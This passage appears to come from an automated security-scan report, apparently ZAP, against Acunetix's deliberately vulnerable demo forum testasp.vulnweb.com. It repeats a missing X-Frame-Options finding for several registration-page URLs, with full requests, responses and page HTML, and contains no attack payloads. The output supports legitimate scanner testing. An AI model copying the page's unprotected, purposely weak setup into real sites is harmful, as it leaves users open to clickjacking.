traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is 